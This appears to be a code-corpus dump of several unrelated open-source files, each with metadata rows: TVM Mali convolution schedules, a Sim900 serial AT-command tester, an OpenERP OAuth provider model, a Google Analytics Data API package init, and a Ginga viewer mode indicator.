matches = re.findall(reObj, message);
prefix = ("An error occurred in mavgen:" if len(matches) == 1 else "Errors occured in mavgen:\n")
message = re.sub(reObj, '\n', message);
return prefix + message
# End of Application class
# ---------------------------------
"""\
This class mimics an ArgumentParser Namespace since mavgen only
accepts an object for its opts argument.
"""
class MavgenOptions:
def __init__(self,language,protocol,output,error_limit):
self.language = language
self.wire_protocol = protocol
self.output = output
self.error_limit = error_limit;
# End of MavgenOptions class
# ---------------------------------
# ---------------------------------
# Start
if __name__ == '__main__':
app = Application()
app.master.title(title)
app.mainloop()
| lgpl-3.0 | 5,586,866,063,895,823,000 | 32.897674 | 198 | 0.608946 | false |
phisiart/tvm | topi/python/topi/mali/conv2d.py | 1 | 22691 | # pylint: disable=invalid-name,unused-variable,unused-argument,no-else-return
"""conv2d schedule on ARM Mali GPU"""
from __future__ import absolute_import as _abs
import numpy as np
import tvm
from .. import generic
from .. import util
from .. import tag
from ..nn import pad
from ..nn.conv2d import conv2d
from ..nn.util import get_pad_tuple
##### SCHEDULE UTILITIES #####
def fuse_and_bind(s, tensor, axis=None, num_thread=None):
""" fuse all the axis and bind to GPU threads """
axis = axis or s[tensor].op.axis
fused = s[tensor].fuse(*axis)
max_threads = tvm.target.current_target(allow_none=False).max_num_threads
bx, tx = s[tensor].split(fused, num_thread or max_threads)
s[tensor].bind(bx, tvm.thread_axis("blockIdx.x"))
s[tensor].bind(tx, tvm.thread_axis("threadIdx.x"))
return bx, tx
def tile_and_bind(s, tensor, y, x, y_factor, x_factor=None):
""" tile and bind to GPU threads """
x_factor = x_factor or y_factor
yo, xo, yi, xi = s[tensor].tile(y, x, y_factor, x_factor)
s[tensor].bind(xo, tvm.thread_axis("blockIdx.x"))
s[tensor].bind(xi, tvm.thread_axis("threadIdx.x"))
s[tensor].bind(yo, tvm.thread_axis("blockIdx.y"))
s[tensor].bind(yi, tvm.thread_axis("threadIdx.y"))
return yo, xo, yi, xi
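# Illustrative note (added; not part of the original file): given a 2-D compute
# such as C = tvm.compute((64, 64), lambda y, x: A[y, x] + 1.0), calling
# tile_and_bind(s, C, y, x, 4, 4) splits each axis into an outer and a 4-wide
# inner part, binds the outer parts to blockIdx.{y,x} and the inner parts to
# threadIdx.{y,x}, so each GPU work-group of 4x4 threads computes one 4x4 tile.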
def tile_and_bind3d(s, tensor, z, y, x, z_factor=2, y_factor=None, x_factor=None):
""" tile and bind 3d """
y_factor = y_factor or z_factor
x_factor = x_factor or y_factor
zo, zi = s[tensor].split(z, z_factor)
yo, yi = s[tensor].split(y, y_factor)
xo, xi = s[tensor].split(x, x_factor)
s[tensor].bind(zo, tvm.thread_axis("blockIdx.z"))
s[tensor].bind(zi, tvm.thread_axis("threadIdx.z"))
s[tensor].bind(yo, tvm.thread_axis("blockIdx.y"))
s[tensor].bind(yi, tvm.thread_axis("threadIdx.y"))
s[tensor].bind(xo, tvm.thread_axis("blockIdx.x"))
s[tensor].bind(xi, tvm.thread_axis("threadIdx.x"))
def pack_tensor(s, tensor, factor, readers):
""" do transform X[n, m] -> X[n / factor, m, factor] """
tmp = s.cache_read(tensor, 'global', readers)
y, x = s[tmp].op.axis
yo, yi = s[tmp].split(y, factor)
s[tmp].reorder(yo, x, yi)
s[tmp].compute_inline()
return s.cache_write(tmp, 'global')
def transpose(s, tensor, readers):
""" do transform X[n, m] -> X[m, n] """
tmp = s.cache_read(tensor, 'global', readers)
y, x = s[tmp].op.axis
s[tmp].reorder(x, y)
s[tmp].compute_inline()
return s.cache_write(tmp, "global"), tmp
def const_array(data, name):
""" convert an const array to tvm tensor"""
row, col = data.shape
dtype = str(data.dtype)
def select_array(i, j):
now = tvm.const(0.0, dtype)
for ii in range(row):
for jj in range(col):
now = tvm.select(tvm.all(i % row == ii, j % col == jj),
tvm.const(data[ii][jj], dtype),
now)
return now
return tvm.compute(data.shape, select_array, name=name)
@conv2d.register(["mali"])
def decl_conv2d(data, kernel, stride, padding, layout='NCHW', out_dtype='float32'):
"""Conv2D operator for ARM Mali GPU backend.
Parameters
----------
data : tvm.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.Tensor
4-D with shape [num_filter, in_channel, filter_height, filter_width]
stride : int or a list/tuple of two ints
stride size, or [stride_height, stride_width]
padding : int or a list/tuple of two ints
padding size, or [pad_height, pad_width]
layout : str
layout of data
Returns
-------
output : tvm.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
assert layout == 'NCHW', "only support NCHW convolution on mali"
assert data.shape[0].value == 1, "only support batch size=1 convolution on mali"
assert data.dtype == kernel.dtype, "Do not support inputs with different data types now."
out_dtype = data.dtype
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
kernel_shape = util.get_const_tuple(kernel.shape)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
if (kernel_shape[2:4] == (3, 3) and (HPAD, WPAD) == (1, 1) and kernel_shape[0] >= 64 and
(HSTR, WSTR) == (1, 1)):
return _decl_winograd(data, kernel, stride, padding, layout, out_dtype)
elif kernel_shape[2:4] == (1, 1):
return _decl_im2col(data, kernel, stride, padding, layout, out_dtype)
else:
return _decl_spatialpack(data, kernel, stride, padding, layout, out_dtype)
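# Illustrative usage sketch (added; not part of the original file; the exact
# target setup depends on the TVM version in use):
#
#     data = tvm.placeholder((1, 256, 14, 14), name='data')
#     kernel = tvm.placeholder((256, 256, 3, 3), name='kernel')
#     with tvm.target.mali():
#         conv = decl_conv2d(data, kernel, stride=1, padding=1)
#         s = schedule_conv2d_nchw([conv])
#         func = tvm.build(s, [data, kernel, conv])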
@generic.schedule_conv2d_nchw.register(["mali"])
def schedule_conv2d_nchw(outs):
"""Schedule for conv2d_nchw for ARM Mali GPU
Parameters
----------
outs: Array of Tensor
The computation graph description of conv2d_nchw
in the format of an array of tensors.
Returns
-------
s: Schedule
The computation schedule for conv2d_nchw.
"""
outs = [outs] if isinstance(outs, tvm.tensor.Tensor) else outs
s = tvm.create_schedule([x.op for x in outs])
def traverse(op):
"""inline all one-to-one-mapping operators except the last stage (output)"""
if tag.is_broadcast(op.tag):
if op not in s.outputs:
s[op].compute_inline()
for tensor in op.input_tensors:
if tensor.op.input_tensors:
traverse(tensor.op)
if 'im2col_conv_output' in op.tag:
_schedule_im2col_conv2d(s, op)
if 'spatialpack_conv_output' in op.tag:
_schedule_spatialpack_conv2d(s, op)
if 'winograd_conv_output' in op.tag:
_schedule_winograd(s, op)
traverse(outs[0].op)
return s
def _decl_spatialpack(data, kernel, stride, padding, layout, out_dtype):
"""declare the spatialpack method (spatial packing) for conv2d"""
_, CI, IH, IW = [util.get_const_int(x) for x in data.shape]
CO, _, KH, KW = [util.get_const_int(x) for x in kernel.shape]
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
HCAT, WCAT = KH - 1, KW - 1
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
N = 1
TH = IH + 2*HPAD
TW = IW + 2*WPAD
OH = (IH + 2*HPAD - KH) // HSTR + 1
OW = (IW + 2*WPAD - KW) // WSTR + 1
DO_PAD = (HPAD != 0 and WPAD != 0)
if DO_PAD:
data_pad = pad(data, (0, 0, HPAD, WPAD), name="data_pad")
else:
data_pad = data
# set tunable parameters (tile factor, ...)
tune_config = getattr(tvm.target.current_target(), "tune_config", None)
if tune_config is None:
VH = 1
VW, VC = 4, 4
# correct tile factor
if OW % VW != 0:
if OW == 14:
VW = 2
VC = 8
elif OW == 7:
VW = 7
else:
VH = tune_config['VH']
VW = tune_config['VW']
VC = tune_config['VC']
if data.dtype == 'float16':
VC *= 2
assert CO % VC == 0
assert OH % VH == 0, "OH: %d VH : %d" % (OH, VH)
assert OW % VW == 0, "OW: %d VW : %d" % (OW, VW)
dvshape = (N, TH//(VH*HSTR), TW//(VW*WSTR), CI, VH*HSTR+HCAT, VW*WSTR+WCAT)
kvshape = (CO // VC, CI, KH, KW, VC)
ovshape = (N, CO // VC, OH // VH, OW // VW, VH, VW, VC)
oshape = (N, CO, OH, OW)
data_vec = tvm.compute(dvshape, lambda n, h, w, ci, vh, vw:
data_pad[n][ci][h*VH*HSTR+vh][w*VW*WSTR+vw],
name='data_vec')
kernel_vec = tvm.compute(kvshape, lambda co, ci, kh, kw, vc:
kernel[co*VC+vc][ci][kh][kw],
name='kernel_vec')
ci = tvm.reduce_axis((0, CI), name='ci')
kh = tvm.reduce_axis((0, KH), name='kh')
kw = tvm.reduce_axis((0, KW), name='kw')
conv = tvm.compute(ovshape, lambda n, co, h, w, vh, vw, vc:\
tvm.sum(data_vec[n, h, w, ci, vh*HSTR+kh, vw*WSTR+kw].astype(out_dtype) *
kernel_vec[co, ci, kh, kw, vc].astype(out_dtype),
axis=[ci, kh, kw]), name='conv')
output = tvm.compute(oshape, lambda n, co, h, w:
                         conv[n][co//VC][h//VH][w//VW][h%VH][w%VW][co%VC],
name='output_unpack', tag='spatialpack_conv_output')
return output
def _schedule_spatialpack_conv2d(s, op):
"""schedule the spatialpack method (spatial packing) for conv2d"""
# get ops and tensors
output = op.output(0)
output_height = util.get_const_int(output.shape[2])
conv = op.input_tensors[0]
data_vec = s[conv].op.input_tensors[0]
kernel_vec = s[conv].op.input_tensors[1]
data = s[data_vec].op.input_tensors[0]
kernel = s[kernel_vec].op.input_tensors[0]
# set tunable parameters (tile factor, ...)
tune_config = getattr(tvm.target.current_target(), "tune_config", None)
if tune_config is None:
num_thread = 8
out_channel = util.get_const_int(kernel.shape[0])
in_channel = util.get_const_int(kernel.shape[1])
in_width = util.get_const_int(data.shape[2])
if in_width >= 224:
pass
elif in_width >= 112:
pass
elif in_width >= 56:
if out_channel != in_channel:
num_thread = 16
elif in_width >= 28:
if out_channel >= 256:
num_thread = 16
elif in_width >= 14:
if in_channel == out_channel:
num_thread = 8
else:
num_thread = 4
else:
num_thread = tune_config["num_thread"]
last = 1
if output_height == 28:
last = 7
num_thread = 32
if data.dtype == 'float16' and (util.get_const_int(conv.shape[1]) == 4 or output_height == 28):
num_thread //= 2
# schedule padding
if isinstance(data.op, tvm.tensor.ComputeOp) and "pad" in data.op.tag:
data_pad = data
data = data_pad.op.input_tensors[0]
s[data_pad].compute_inline()
# schedule data packing
_, h, w, ci, vh, vw = s[data_vec].op.axis
tile_and_bind3d(s, data_vec, h, w, ci, 1)
s[data_vec].unroll(vw)
# schedule kernel packing
co, ci, kh, kw, vc = s[kernel_vec].op.axis
tile_and_bind(s, kernel_vec, co, ci, 1)
s[kernel_vec].unroll(kh)
s[kernel_vec].unroll(kw)
s[kernel_vec].vectorize(vc)
# schedule convolution
_, c, h, w, vh, vw, vc = s[conv].op.axis
kc, kh, kw = s[conv].op.reduce_axis
s[conv].reorder(_, c, h, w, vh, kc, kh, kw, vw, vc)
tile_and_bind3d(s, conv, c, h, w, num_thread, 1, last)
s[conv].unroll(kh)
s[conv].unroll(kw)
s[conv].unroll(vw)
s[conv].vectorize(vc)
# schedule output
if output.op not in s.outputs: # has bias
s[output].compute_inline()
output = s.outputs[0]
_, co, oh, ow = s[output].op.axis
tile_and_bind3d(s, output, co, oh, ow, num_thread, 1, last)
def _decl_im2col(data, kernel, stride, padding, layout='NCHW', out_dtype='float32'):
"""declare the Im2Col method for conv2d"""
_, CI, IH, IW = [x.value for x in data.shape]
CO, _, KH, KW = [x.value for x in kernel.shape]
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
N = 1
OH = (IH + 2*HPAD - KH) // HSTR + 1
OW = (IW + 2*WPAD - KW) // WSTR + 1
DO_PAD = (HPAD != 0 and WPAD != 0)
if DO_PAD:
data_pad = pad(data, (0, 0, HPAD, WPAD), name="data_pad")
else:
data_pad = data
ALIGN = 16
def upround(x, align):
return (x + align - 1) // align * align
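    # Explanatory note (added; not in the original file): im2col rewrites the
    # convolution as a single matrix multiply.  Each flattened kernel becomes a
    # row of A (CO x CI*KH*KW) and each output position's receptive field
    # becomes a column of B (CI*KH*KW x N*OH*OW), so the convolution result is
    # C = A x B, reshaped back to (N, CO, OH, OW) below.  Both GEMM dimensions
    # are rounded up to ALIGN so the tiles divide evenly.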
# A [CO, CI * KH * KW]
reduce_len = upround(CI * KH * KW, ALIGN)
A = tvm.compute((upround(CO, ALIGN), reduce_len), lambda i, j:
kernel[i][j // KW // KH][j // KW % KH][j % KW], name='A')
# B [CI * KH * KW, N * OH * OW]
B = tvm.compute((reduce_len, upround(N * OH * OW, ALIGN)), lambda i, j:\
tvm.select(tvm.all(i < CI * KH * KW, j < N * OH * OW),
data_pad[j // (OH*OW)][i // (KH*KW)][j // OW % OH*HSTR + i // KW % KH]
[j % OW*WSTR + i % KW],
tvm.const(0, data_pad.dtype)), name='B')
gemm_n, gemm_l, gemm_m = A.shape[0], reduce_len, B.shape[1]
# C [CO, N * OH * OW]
k = tvm.reduce_axis((0, gemm_l), name='k')
C = tvm.compute((gemm_n, gemm_m), lambda i, j: tvm.sum(A[i, k] * B[k, j], axis=k), name='C')
# output
# the last term C[gemm_n-1, gemm_m-1] is for enabling the alignment,
# otherwise the alignment above will be eliminated by bound inference
output = tvm.compute((N, CO, OH, OW), lambda n, co, h, w:\
                         C[co][n * OH * OW + h * OW + w] + tvm.const(0, C.dtype) * C[gemm_n-1, gemm_m-1],
name='output', tag='im2col_conv_output')
return output
def _schedule_im2col_conv2d(s, op):
"""schedule the Im2Col method for conv2d"""
# get ops and tensors
output = op.output(0)
C = op.input_tensors[0]
A, B = C.op.input_tensors
kernel = A.op.input_tensors[0]
data = B.op.input_tensors[0]
# tuning parameter config
tune_config = getattr(tvm.target.current_target(), "tune_config", None)
if tune_config is None: # use rule
bn = 4
unroll_step = 16
total_work = util.get_const_int(C.shape[0] * C.shape[1])
reduce_work = util.get_const_int(A.shape[1])
if total_work > 200000:
last_work = util.get_const_int(C.shape[1])
if last_work > 10000:
num_thread = 16
elif last_work > 3000:
num_thread = 8
elif reduce_work > 100:
num_thread = 4
else:
num_thread = 2
if reduce_work < 50 and last_work < 30000:
num_thread = 4
elif total_work > 150000:
num_thread = 8
elif total_work > 50000:
num_thread = 4
else:
num_thread = 2
if num_thread == 4:
unroll_step = 2
else:
bn = tune_config["bn"]
num_thread = tune_config["num_thread"]
unroll_step = tune_config["unroll_step"]
bna = bnb = bn
num_thread1 = num_thread2 = num_thread
if data.dtype == 'float16':
bnb *= 2
last_work = util.get_const_int(C.shape[1])
if last_work % (bnb * num_thread2) != 0:
num_thread1 = num_thread * 2
num_thread2 = num_thread // 2
# schedule padding
if isinstance(data.op, tvm.tensor.ComputeOp) and "pad" in data.op.tag:
data_pad = data
s[data_pad].compute_inline()
##### SCHEDULE A #####
if util.get_const_int(kernel.shape[2]) == 1 and util.get_const_int(kernel.shape[3]) == 1:
s[A].compute_inline()
else:
y, x = s[A].op.axis
yo, xo, yi, xi = s[A].tile(y, x, bna, util.get_const_int(kernel.shape[3]))
s[A].vectorize(xi)
fuse_and_bind(s, A, [yo, xo])
# pack to vector form
packedA = pack_tensor(s, A, bna, [C])
# vectorize load
y, x = s[packedA].op.axis[:2]
tmp = s.cache_write(packedA, "local")
x, xt = s[packedA].split(x, bna)
_, _, _, xi = tile_and_bind(s, packedA, y, x, num_thread)
s[tmp].compute_at(s[packedA], xi)
s[tmp].vectorize(s[tmp].op.axis[1])
s[tmp].unroll(s[tmp].op.axis[2])
s[packedA].vectorize(s[packedA].op.axis[2])
s[packedA].unroll(xt)
##### SCHEDULE B #####
y, x = s[B].op.axis
yo, xo, yi, xi = s[B].tile(y, x, 1, 1 * bnb)
fuse_and_bind(s, B, [yo, xo])
# transpose and pack to vector form
B_transpose, B_tmp = transpose(s, B, [C])
s[B_transpose].compute_inline()
packedB = pack_tensor(s, B_transpose, bnb, [B_tmp])
# vectorize load
s[packedB].vectorize(s[packedB].op.axis[2])
y, x = s[packedB].op.axis[:2]
tile_and_bind(s, packedB, y, x, num_thread)
##### SCHEDULE C #####
# vectorize and unroll dot
y, x = s[C].op.axis
y, x, yt, xt = s[C].tile(y, x, bna, bnb)
k = s[C].op.reduce_axis[0]
s[C].reorder(k, yt, xt)
if unroll_step != 1:
k, k_unroll = s[C].split(k, unroll_step)
s[C].unroll(k_unroll)
s[C].unroll(yt)
s[C].vectorize(xt)
tile_and_bind(s, C, y, x, num_thread1, num_thread2)
##### COPY TO OUTPUT #####
if output.op in s.outputs: # no bias
output = output
else: # has bias
s[output].compute_inline()
output = s.outputs[0]
n, co, h, w = s[output].op.axis
h, w, vh, vw = s[output].tile(h, w, 1, bnb)
s[output].unroll(vh)
if util.get_const_int(s[output].op.output(0).shape[3]) % bnb != 0:
pass
else:
s[output].vectorize(vw)
fuse_and_bind(s, output, [n, co, h, w])
def _decl_winograd(data, kernel, stride, padding, layout, out_dtype):
"""declare winograd fast convolution F(2x2, 3x3) for conv2d"""
N, CI, H, W = [util.get_const_int(x) for x in data.shape]
CO, CI, KH, KW = [util.get_const_int(x) for x in kernel.shape]
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
assert HSTR == 1 and WSTR == 1 and HPAD == 1 and WPAD == 1 and KH == 3 and KW == 3
data_pad = pad(data, (0, 0, HPAD, WPAD), name="data_pad")
B_data = np.array([
[1, 0, 0, 0],
[0, 1, -1, 1],
[-1, 1, 1, 0],
[0, 0, 0, -1]
], out_dtype)
G_data = np.array([
[1, 0, 0],
[1.0/2, 1.0/2, 1.0/2],
[1.0/2, -1.0/2, 1.0/2],
[0, 0, 1],
], out_dtype)
A_data = np.array([
[1, 0],
[1, 1],
[1, -1],
[0, -1],
], out_dtype)
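    # Explanatory note (added; not in the original file): with these constant
    # matrices the Winograd F(2x2, 3x3) algorithm computes each 2x2 output tile
    # as  Y = A^T [ (G g G^T) * (B^T d B) ] A,  where g is a 3x3 kernel tile,
    # d is a 4x4 input tile and '*' is element-wise multiplication.  Below, U
    # holds the transformed kernels, V the transformed input tiles, M their
    # batched product, and Y applies the inverse transform.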
m = 2
r = 3
alpha = m + r - 1
K = CO
C = CI
nH, nW = (H + m-1) // m, (W + m-1) // m
P = N * nH * nW
bna, bnb = 4, 4
if data.dtype == 'float16':
bnb *= 2
P_round = (P + bnb - 1) // bnb * bnb
assert K % bna == 0 and P_round % bnb == 0
# pack input tile
input_tile = tvm.compute((C, P_round // bnb, alpha, alpha, bnb),
lambda c, b, eps, nu, bb:
tvm.select(b * bnb + bb < P,\
data_pad[(b*bnb+bb) // (nH*nW)][c][(b*bnb+bb) // nW % nH * m + eps]\
[(b*bnb+bb) % nW * m + nu], tvm.const(0, data_pad.dtype)),
name='d')
# transform kernel
G = const_array(G_data, 'G')
r_kh = tvm.reduce_axis((0, KH), 'r_kh')
r_kw = tvm.reduce_axis((0, KW), 'r_kw')
U = tvm.compute((alpha, alpha, K // bna, C, bna), lambda eps, nu, k, c, kk:
tvm.sum(kernel[k * bna + kk][c][r_kh][r_kw] * G[eps][r_kh] * G[nu][r_kw],
axis=[r_kh, r_kw]), name='U')
# transform image
B = const_array(B_data, 'B')
r_eps = tvm.reduce_axis((0, alpha), 'r_eps')
r_nu = tvm.reduce_axis((0, alpha), 'r_nu')
V = tvm.compute((alpha, alpha, P_round // bnb, C, bnb), lambda eps, nu, b, c, bb:
tvm.sum(input_tile[c][b][r_eps][r_nu][bb] * B[r_eps][eps] * B[r_nu][nu],
axis=[r_eps, r_nu]), name='V')
# batch gemm
c = tvm.reduce_axis((0, C), name='c')
M = tvm.compute((alpha, alpha, K, P_round), lambda eps, nu, k, b:
tvm.sum(U[eps][nu][k // bna][c][k % bna] *
V[eps][nu][b // bnb][c][b % bnb], axis=c), name='M')
# inverse transform
A = const_array(A_data, 'A')
r_eps = tvm.reduce_axis((0, alpha), 'r_eps')
r_nu = tvm.reduce_axis((0, alpha), 'r_nu')
Y = tvm.compute((K, P, m, m), lambda k, b, vh, vw:
tvm.sum(M[r_eps][r_nu][k][b] * A[r_eps][vh] * A[r_nu][vw],
axis=[r_eps, r_nu]), name='Y')
# unpack output
output = tvm.compute((N, K, H, W), lambda n, k, h, w:
Y[k][n * nH * nW + (h//m) * nW + w//m][h % m][w % m]
                         # the following term is used to make the padding effective,
# otherwise the padding will be eliminated by bound inference
+ tvm.const(0, out_dtype) * M[alpha-1][alpha-1][K-1][P_round-1],
name='output', tag='winograd_conv_output')
return output
def _schedule_winograd(s, op):
"""schedule winograd fast convolution F(2x2, 3x3) for conv2d"""
# get ops and tensors
output = op.output(0)
Y = op.input_tensors[0]
M, A = s[Y].op.input_tensors
U, V = s[M].op.input_tensors
kernel, G = s[U].op.input_tensors
d, B = s[V].op.input_tensors
data_pad = s[d].op.input_tensors[0]
data = s[data_pad].op.input_tensors[0]
# padding
s[data_pad].compute_inline()
# pack input tiles
c, b, eps, nu, bb = s[d].op.axis
s[d].reorder(eps, nu, bb)
aha = s[d].fuse(eps, nu)
s[d].unroll(bb)
tile_and_bind3d(s, d, c, b, aha, 4, 1, 1)
# transform kernel
s[G].compute_inline()
eps, nu, k, c, kk, = s[U].op.axis
r_kh, r_kw = s[U].op.reduce_axis
s[U].reorder(k, c, kk, eps, nu, r_kh, r_kw)
_ = [s[U].unroll(x) for x in [eps, nu, r_kh, r_kw]]
s[U].vectorize(kk)
tile_and_bind(s, U, k, c, 1, 256)
# transform image
s[B].compute_inline()
eps, nu, b, c, bb = s[V].op.axis
r_eps, r_nu = s[V].op.reduce_axis
s[V].reorder(b, c, bb, eps, nu, r_nu, r_eps)
_ = [s[V].unroll(x) for x in [eps, nu, r_eps, r_nu]]
s[V].vectorize(bb)
tile_and_bind(s, V, b, c, 2, 1)
# batch gemm
bna, bnb = 4, 4
if data.dtype == 'float16':
bnb *= 2
eps, nu, k, b = s[M].op.axis
c = s[M].op.reduce_axis[0]
yo, xo, yi, xi = s[M].tile(k, b, bna, bnb)
s[M].reorder(c, yi, xi)
c, c_unroll = s[M].split(c, 2)
s[M].unroll(c_unroll)
s[M].unroll(yi)
s[M].vectorize(xi)
z = s[M].fuse(eps, nu)
tile_and_bind3d(s, M, z, yo, xo, 1, 8, 1)
# inverse transform
s[A].compute_inline()
k, b, vh, vw = s[Y].op.axis
r_eps, r_nu = s[Y].op.reduce_axis
_ = [s[Y].unroll(x) for x in [vh, vw, r_eps, r_nu]]
tile_and_bind(s, Y, k, b, 4, 1)
# schedule output
if output.op in s.outputs: # no bias
output = output
else: # has bias
s[output].compute_inline()
output = s.outputs[0]
_, k, h, w = s[output].op.axis
tile_and_bind3d(s, output, k, h, w, 1, 2, 2)
| apache-2.0 | -604,978,453,412,319,400 | 32.467552 | 99 | 0.533692 | false |
UAA-EQLNES/ARTF-Data-Receiver | cmd_tester.py | 1 | 1328 | #! /usr/bin/env python
import argparse
from gpio import enableUart
from serial import Serial
from sim900 import Sim900
from time import sleep
def main():
parser = argparse.ArgumentParser(description='Run Sim900 AT Command Tester.')
parser.add_argument('-p', '--port', help='Serial port', default='/dev/ttyS1')
parser.add_argument('-b', '--baudrate', type=int, help='Baudrate of Sim900 GSM shield', default=115200)
args = parser.parse_args()
port = args.port
baudrate = args.baudrate
    # Need to initialize gpio0 and gpio1 to UART mode if pcDuino.
# If not pcDuino, just ignore the error.
try:
enableUart()
except:
pass
sim900 = Sim900(Serial(port, baudrate, timeout = 10), delay=0.3)
# For non-pcDuino devices, there looks to be a delay before commands
# are sent and read correctly. Waiting two seconds seems to work.
print "Initializing serial connection..."
sleep(2)
print ""
print "Sim900 AT Command Tester"
print "------------------------"
print ""
print "Type 'exit' to end the program."
print ""
while True:
cmd = raw_input("Enter AT command: ")
if cmd == 'exit':
break
sim900.send_cmd(cmd)
print sim900.read_all()
if __name__ == '__main__':
main()
| unlicense | -2,414,242,593,420,755,500 | 26.102041 | 107 | 0.619729 | false |
ttfseiko/openerp-trunk | openerp/addons/auth_oauth/auth_oauth.py | 70 | 1057 | from openerp.osv import osv, fields
class auth_oauth_provider(osv.osv):
"""Class defining the configuration values of an OAuth2 provider"""
_name = 'auth.oauth.provider'
_description = 'OAuth2 provider'
_order = 'name'
_columns = {
'name' : fields.char('Provider name'), # Name of the OAuth2 entity, Google, LinkedIn, etc
'client_id' : fields.char('Client ID'), # Our identifier
'auth_endpoint' : fields.char('Authentication URL'), # OAuth provider URL to authenticate users
'scope' : fields.char('Scope'), # OAUth user data desired to access
'validation_endpoint' : fields.char('Validation URL'), # OAuth provider URL to validate tokens
'data_endpoint' : fields.char('Data URL'),
'enabled' : fields.boolean('Allowed'),
'css_class' : fields.char('CSS class'),
'body' : fields.char('Body'),
'sequence' : fields.integer(),
}
_defaults = {
'enabled' : False,
}
| agpl-3.0 | 50,888,191,929,221,530 | 43.041667 | 115 | 0.578051 | false |
googleapis/python-analytics-data | google/analytics/data_v1alpha/__init__.py | 1 | 3544 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .services.alpha_analytics_data import AlphaAnalyticsDataClient
from .services.alpha_analytics_data import AlphaAnalyticsDataAsyncClient
from .types.analytics_data_api import BatchRunPivotReportsRequest
from .types.analytics_data_api import BatchRunPivotReportsResponse
from .types.analytics_data_api import BatchRunReportsRequest
from .types.analytics_data_api import BatchRunReportsResponse
from .types.analytics_data_api import GetMetadataRequest
from .types.analytics_data_api import Metadata
from .types.analytics_data_api import RunPivotReportRequest
from .types.analytics_data_api import RunPivotReportResponse
from .types.analytics_data_api import RunRealtimeReportRequest
from .types.analytics_data_api import RunRealtimeReportResponse
from .types.analytics_data_api import RunReportRequest
from .types.analytics_data_api import RunReportResponse
from .types.data import Cohort
from .types.data import CohortReportSettings
from .types.data import CohortSpec
from .types.data import CohortsRange
from .types.data import DateRange
from .types.data import Dimension
from .types.data import DimensionExpression
from .types.data import DimensionHeader
from .types.data import DimensionMetadata
from .types.data import DimensionValue
from .types.data import Entity
from .types.data import Filter
from .types.data import FilterExpression
from .types.data import FilterExpressionList
from .types.data import Metric
from .types.data import MetricHeader
from .types.data import MetricMetadata
from .types.data import MetricValue
from .types.data import NumericValue
from .types.data import OrderBy
from .types.data import Pivot
from .types.data import PivotDimensionHeader
from .types.data import PivotHeader
from .types.data import PropertyQuota
from .types.data import QuotaStatus
from .types.data import ResponseMetaData
from .types.data import Row
from .types.data import MetricAggregation
from .types.data import MetricType
__all__ = (
"AlphaAnalyticsDataAsyncClient",
"AlphaAnalyticsDataClient",
"BatchRunPivotReportsRequest",
"BatchRunPivotReportsResponse",
"BatchRunReportsRequest",
"BatchRunReportsResponse",
"Cohort",
"CohortReportSettings",
"CohortSpec",
"CohortsRange",
"DateRange",
"Dimension",
"DimensionExpression",
"DimensionHeader",
"DimensionMetadata",
"DimensionValue",
"Entity",
"Filter",
"FilterExpression",
"FilterExpressionList",
"GetMetadataRequest",
"Metadata",
"Metric",
"MetricAggregation",
"MetricHeader",
"MetricMetadata",
"MetricType",
"MetricValue",
"NumericValue",
"OrderBy",
"Pivot",
"PivotDimensionHeader",
"PivotHeader",
"PropertyQuota",
"QuotaStatus",
"ResponseMetaData",
"Row",
"RunPivotReportRequest",
"RunPivotReportResponse",
"RunRealtimeReportRequest",
"RunRealtimeReportResponse",
"RunReportRequest",
"RunReportResponse",
)
| apache-2.0 | -6,338,435,351,210,538,000 | 32.433962 | 74 | 0.775395 | false |
rajul/ginga | ginga/util/toolbox.py | 3 | 2919 | #
# toolbox.py -- Goodies for enhancing a Ginga viewer
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
class ModeIndicator(object):
"""
This class adds a mode status indicator to a viewer's lower right-hand
corner.
Usage:
Instantiate this class with a Ginga ImageView{Toolkit} object as the
sole constructor argument. Save a reference to the mode indicator
object somewhere so it doesn't get collected.
"""
def __init__(self, viewer):
self.viewer = viewer
# set to false to disable
self.visible = True
# for displaying modal keyboard state
self.mode_obj = None
bm = viewer.get_bindmap()
bm.add_callback('mode-set', self.mode_change_cb)
viewer.add_callback('configure', self._configure_cb)
def mode_change_cb(self, bindmap, mode, modetype):
# delete the old indicator
obj = self.mode_obj
self.mode_obj = None
#canvas = self.viewer.get_canvas()
canvas = self.viewer.private_canvas
if obj:
try:
canvas.deleteObject(obj)
except:
pass
if not self.visible:
return True
# if not one of the standard modifiers, display the new one
if not mode in (None, 'ctrl', 'shift'):
Text = canvas.getDrawClass('text')
Rect = canvas.getDrawClass('rectangle')
Compound = canvas.getDrawClass('compoundobject')
if modetype == 'locked':
text = '%s [L]' % (mode)
else:
text = mode
xsp, ysp = 4, 6
wd, ht = self.viewer.get_window_size()
if self.viewer._originUpper:
x1, y1 = wd-12*len(text), ht-12
else:
# matplotlib case
x1, y1 = wd-12*len(text), 12
o1 = Text(x1, y1, text,
fontsize=12, color='yellow', coord='canvas')
wd, ht = self.viewer.renderer.get_dimensions(o1)
# yellow text on a black filled rectangle
if self.viewer._originUpper:
a1, b1, a2, b2 = x1-xsp, y1+ysp, x1+wd+xsp, y1-ht
else:
# matplotlib case
a1, b1, a2, b2 = x1-xsp, y1-ysp, x1+wd+2*xsp, y1+ht+ysp
o2 = Compound(Rect(a1, b1, a2, b2,
color='black', coord='canvas',
fill=True, fillcolor='black'),
o1)
self.mode_obj = o2
canvas.add(o2)
return True
